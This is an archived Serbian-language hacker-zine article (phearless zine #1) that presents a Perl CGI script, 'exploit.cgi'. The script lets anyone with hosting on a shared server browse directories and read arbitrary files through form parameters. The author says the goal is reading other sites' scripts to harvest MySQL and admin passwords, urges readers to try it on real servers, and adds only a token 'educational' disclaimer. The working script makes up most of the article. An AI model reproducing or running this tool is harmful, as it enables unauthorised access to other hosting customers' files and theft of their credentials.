1x10 CGI Exploiting

Published in

· 10 months ago

 
                          ................... 
                    ...::: phearless zine #1 :::... 

.......................>---[ CGI Exploiting ]---<......................... 

........................>---[ by De1Rekt0n ]---<.......................... 
                                               mil0s[at]headcoders[dot]net 

 
Mnogi serveri danas imaju podrsku za cgi, CGI je Common Gateway Interface, 
jos jedan server side scripting jezik preko koga mozete dosta toga izvuci. 
Vecina servera je busno tako da mozete preko vase scripte citati fajlove na 
serveru gde imate hosting, znaci mozete ici po serveru i citati tudje 
scripte u kojima cesto mozete naci sifre za pristup mySQL-u ili sifre admin 
delova sajta. 

Ja sam napisao jednu cgi scriptu koja obavlja taj posao, nadam se da ce vam 
dobro doci posto nisam se nesto potrudio da usavrsavam scriptu, ona 
jednostavno radi posao: 

------------------------------------------------------------exploit.cgi 
##################################################### 
#coded by De1Rekt0n                           # 
##################################################### 
#!/usr/bin/perl 
&get_form; 
use CGI qw (:standard); 
$q= new CGI; 
$dir=$FORM{selected}; 
$file=$FORM{fajl}; 
$filename = "exploit.cgi"; 
$putanja="/$dir"; 
print $q->header; 

print<<EOF; 

html> 
<head> 
<title>CGI exploit coded by De1Rekt0n</title> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
</head> 
<body bgcolor="#FFFFFF" text="#000000"> 
<table width="80%" border="0" align="center" height="180"> 
  <tr>  
    <td bgcolor="#003366" width="42%" height="33"><font face="Verdana, 
Arial, Helvetica, sans-serif" color="#FFFFFF">cgi  
      exploit coded by De1Rekt0n</font></td> 
    <td width="58%" height="33"> </td> 
  </tr> 
  <tr>  
    <td width="42%" align="left" valign="top" rowspan="2"><font 
face="Geneva, Arial, Helvetica, san-serif" size="-1">Files and directories 
in current directory<br> 
EOF 
open (FAJLA, "$file"); 
             
      while (defined ($red=<FAJLA>)) { 
            chomp ($red);      
            print "<BR>$red";        
      } 
      close FAJLA;       

opendir (DIR, "$putanja"); 
@fajlovi = readdir(DIR); 
close(DIR); 
$i=0; 
while(defined($fajl=$fajlovi[$i])){ 
chomp ($fajl); 

 
print<<HTML; 
form name="form1" method="post" action="$filename"> 
<a 
href="$filename?selected=$putanja/$fajl&fajl=$putanja/$fajl">$fajl</a><BR> 
<input type="hidden" name="selected" value="$putanja/$fajl"> 
<input type="hidden" name="fajl" value="$fajl"> 
HTML 
$i=$i+1; 
} 
print<<EOF; 
/font></td> 
    <td width="58%" align="left" valign="top" height="22"><font 
face="Geneva, Arial, Helvetica, san-serif" size="-1">Current directory 
      :$putanja</font></td> 
  </tr> 
  <tr>  
    <td width="58%" align="left" valign="top">  
         
  </td> 
  </tr> 
</table> 

 
</body> 
</html> 
EOF 
exit; 
########################################################### 
# preuzimanje formulara                                   # 
########################################################### 
sub get_form { 

      if ($ENV{"REQUEST_METHOD"} eq 'GET') { 
      $buffer = $ENV{'QUERY_STRING'}; 
      } else { 
            read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); 
      } 
      @pairs = split(/&/, $buffer); 
      foreach $pair (@pairs) { 
            ($name, $value) = split(/=/, $pair); 
            $value =~ tr/+/ /;  
            $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 
            $FORM{$name} = $value; 
      } 
}  
--------------------------------------------------------------------EOF 

To je to nema puno toga sta reci o ovome jednostavno uploadujete scriptu 
stavite je u vas cgi-bin direktorijum chmod-ujte na 755 i to je sve. 
Nazalost vecina admina ne brine o ovome tako da ovo radi na mnogim serverima 
pa isprobajte. 
Ja ni na koji nacin nisam odgovoran na stetu koju nanesete ovo je namenjeno 
samo u edukativne svrhe, a i da bi admini obratili paznju i zakrpili ovo. 

Pozdravi: CyberB, BaCkSpAcE,  PhrozenShade, _bl00dZ3r0_, AcidCookie, 
BoyScout, DownBload, h4z4rd, fr1tz, Shatterhand, EsC, Exoduks, Re00t, 
SunDance i svima koje sam zaboravio... 

+---------------------------+ 
|site1: www.coders.co.yu    | 
|site2: www.ii-labs.org     | 
|mail:  mil0s@headcoders.net| 
+---------------------------+

1x10 CGI Exploiting

Share this article

Let's discover also

CGI, Perl, Scripts, etc.

N0RoUTE Issue 2-09 Security HOLE in CGI

Exploits - CGI & Stuff

3x08 xtreem Exploiting Steps

1x09 Exploiting ShopAdmin

3x09 Exploiting Non-exec Stack

3x10 Exploiting Stack BOF over SEH

1- Exploiting x86 stack based buffer overflows

7 - Further advances in to exploiting vulnerable format string bugs

The Belgian Hackers Zone Issue 08

Recent Articles

The Electrical Knowledge of Ancient Civilizations

Mind Control Cult Newsletter -- Issue #5

Mind Control Cult Newsletter -- Issue #4

Mind Control Cult Newsletter -- Issue #3

Mind Control Cult Newsletter -- Issue #2

Mind Control Cult Newsletter -- Issue #1

Physics (Book 8) by Aristotle

Physics (Book 7) by Aristotle

Physics (Book 6) by Aristotle

Physics (Book 5) by Aristotle

Recent Comments